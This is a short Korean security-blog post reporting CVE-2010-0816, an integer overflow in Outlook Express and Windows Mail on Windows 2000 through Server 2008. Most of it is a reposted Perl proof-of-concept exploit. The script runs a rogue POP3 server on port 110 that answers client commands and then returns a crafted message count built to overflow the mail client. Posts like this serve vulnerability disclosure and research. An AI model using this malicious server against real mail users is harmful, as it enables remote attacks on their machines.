본문 바로가기
취약점소식

[MS] Outlook Express and Windows Mail Integer Overflow

by 잡다한 처리 2010. 5. 11.
반응형



아웃룩 익스프레스와 윈도우 메일에 대한 Exploit이 발견되었다.

Platforms:   Windows 2000
Windows XP
Windows Vista
Windows server 2003
Windows Server 2008 SR2

Exploitation:   Remote Exploitable   
CVE Number:   CVE-2010-0816
Discover Date:   2009-09-11
Author:   Francis Provencher (Protek Research Lab's)
Website:   http://www.protekresearchlab.com



- Exploit Code

#!/usr/bin/perl -w
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Microsoft Windows Mail CLient & outlook express Remote Integer Overflow
#



use IO::Socket;

$port = 110;

$serv = IO::Socket::INET->new(Proto=>'tcp',
LocalPort=>$port,
Listen=>1)
or die "Error: listen($port)\n";

$cli = $serv->accept() or die "Error: accept()\n";


$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK 357913944 100\r\n");


댓글